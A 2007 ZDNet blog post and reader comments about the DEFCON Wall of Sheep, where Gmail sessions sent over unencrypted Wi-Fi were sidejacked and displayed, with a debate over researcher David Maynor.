Real World IT

George Ou

DEFCON 2007 - Wall of Sheep (shame)

By George Ou | August 6, 2007, 11:38pm PDT

It’s time to count sheep again and I don’t mean the ones in your sleep. I’m talking about the ones on the Wi-Fi Hotspot that are using insecure protocols and getting their online accounts compromised. What you’re looking at below is the DEFCON 15 Wall of Sheep.

What do I mean by compromised? Usually that means username and passwords are being transmitted in the clear for anyone to see or it means your account can be hijacked such that an attacker can get in to your account anytime they want after they copy your online Web session. In the above screen shot, a VERY large number of Gmail accounts that failed to use secure HTTPS (https://mail.google.com) were hijacked. This is despite the fact that they logged in using HTTPS because Gmail by default automatically kicks you back in to HTTP mode.

The Wall of Sheep team hunts down the sheep in their command bunker

Robert Graham and David Maynor side-jacking sheep with Hamster

Learn how to protect your online privacy here.

Kick off your day with ZDNet's daily e-mail newsletter. It's the freshest tech news and opinion, served hot. Get it.

More from “Real World IT”

Undercover NBC Dateline reporter bolts from DEFCON 2007

How to protect your online privacy

Topics

Google Gmail, Wall, George Ou

Full Bio
Disclosure
Contact

Vendor HotSpot

Here to help you with your Document Management Needs

Read the DocuMentor blog now

Learn More »

Talkback Most Recent of 10 Talkback(s)

Follow via:: RSS; Email Alert

Not good

This sense of smug superiority can't end well. It's a useful service, but let's not forget they're compromising the easiest targets first and foremost. Let's keep our perspective, please.

...and yet another homage to Maynor? Wow. Just wow. I hear there were actually other security researchers at the event. Don't be too shy to introduce yourself.
GW Mahoney
7th Aug 2007
- Reply to
- Flag
They were just doing their job of sploitin'

At least, I think that is what you are to do at DEFCON.
nucrash
7th Aug 2007
- Reply to
- Flag
GMail, and millions will bennefit

Whether they are smug or not, do you think Google hasn't already got a team working at making taking over Gmail accounts harder? I would not be surprised if HTTPS became the default soon and users will have no HTTP access soon.

TripleII
TripleII-21189418044173169409978279405827
7th Aug 2007
- Reply to
- Flag
Your obsession has to end

Your obsession with Maynor bashing has to end. Besides, this wasn't a Maynor project. Hamster was a Robert Graham project and it's hardly the entire story here with just one little photo at the bottom of the page.
georgeou
7th Aug 2007
- Reply to
- Flag
We're still waiting

You had promised us emails and exposes about how poor Maynor had been slimed by others.
Robert Crocker
8th Aug 2007
- Flag
That was released back in March

http://blogs.zdnet.com/Ou/?p=451
georgeou
8th Aug 2007
- Flag
You may not agree

And I don't agree either, but George did present his rationale ( http://blogs.zdnet.com/Ou/?p=451 ) and I give him credit for that.

I didn't think Fox was out of line to publicize the fact that SecureWorks would not confirm the original claims. If someone drops a bomb that any MacBook can be remotely hijacked in 60 seconds, then they claim that their demonstration did not intend to make that claim - in other words, "we didn't say that" - *that* is a retraction. The fact is Maynor or SecureWorks should have confirmed or formally retracted their own assault, but they chose not to.

Some people went too far, saying Maynor admitted to lying, which he clearly did not do. In the end, since it turned out to be a fraud, they were proved morally right, but it was still irresponsible reporting.

I say fraud, because the best they could have had was something that was very hard to reproduce, which is not what was presented to Krebs. If fact, that private demo almost had to be rigged, since it worked the first time. However, since his incredible statements, "I didn?t feel the need to do the do the entire hijack", and "This is now a dead subject for me", we should assume the worst of the remaining unanswered questions, which is to say that after months of effort he could not reproduce it on a standard MacBook.

George may not share my opinion that David is a disgraced researcher, but when I see him or his company being used as a primary source, it's always a jolt.
GW Mahoney
8th Aug 2007
- Flag
Again, this post has nothing to do with Maynor

This is a Robert Graham project which he proved on stage and to me when he hijacked some Gmail accounts. The code is being released within a week.
georgeou
8th Aug 2007
- Flag
Already posted (link)

I think this is it:

http://www.erratasec.com/sidejacking.zip

I wasn't doubting that Robert had done this. I was saying that it's already been done and he was just scripting it. Does this really count as security research?

I encourage other programmers to comment. My perception is that anyone who's written a bot could do this in one sitting.
GW Mahoney
9th Aug 2007
- Flag
n3tw0rks4t4n

I have a hunch that this year, the Wall of Sheep crew are going to end up being the sheep. They will not be able to perform their network plain-text pass scouering duties, once we get ahold of their boxen. They won't know when or wherefrom it hit, nor will their weak distros be able to match our challenge =) here's to hell-acious hacking! n3tw0rks4t4n
b5981202
28th Jun
- Reply to
- Flag

Talkback - Tell Us What You Think

Subject (max length: 75):

Reply: Formatting +

BB Codes - Note: HTML is not supported in forums

[b] Bold [/b]
[i] Italic [/i]
[u] Underline [/u]
[s] Strikethrough [/s]
[q] "Quote" [/q]

[ol][*] 1. Ordered List [/ol]
[ul][*] · Unordered List [/ul]
[pre] Preformat [/pre]
[quote] "Blockquote" [/quote]

The best of ZDNet, delivered

ZDNet Newsletters

Get the best of ZDNet delivered straight to your inbox

Blogs From Our Sponsors

Facebook Activity

Blog Roll

Blog Archive

White Papers, Webcasts, & Resources

Selecting the Right EHR for the Life of Your Practice and Your PatientsIf we are at or approaching a technological tipping point in the history ... (Hewlett-Packard (HP))Download Now
Strategies to reduce the costs of managing healthcare dataDownload this whitepaper to discover information to help hospitals adapt ... (Hewlett-Packard (HP))Download Now
IT Consumerization and Google AppsAs smartphones have become nearly ubiquitous, tablets have finally taken ... (Google)Download Now

ZDNet is available in the following editions:

Special Reports

Hot Topics

DEFCON 2007 - Wall of Sheep (shame)

More from “Real World IT”

Topics

Disclosure

George Ou

Biography

George Ou

Vendor HotSpot

Talkback Most Recent of 10 Talkback(s)

Talkback - Tell Us What You Think

The best of ZDNet, delivered

Blogs From Our Sponsors

Facebook Activity

Blog Roll

Blog Archive

White Papers, Webcasts, & Resources

Featured Articles

Services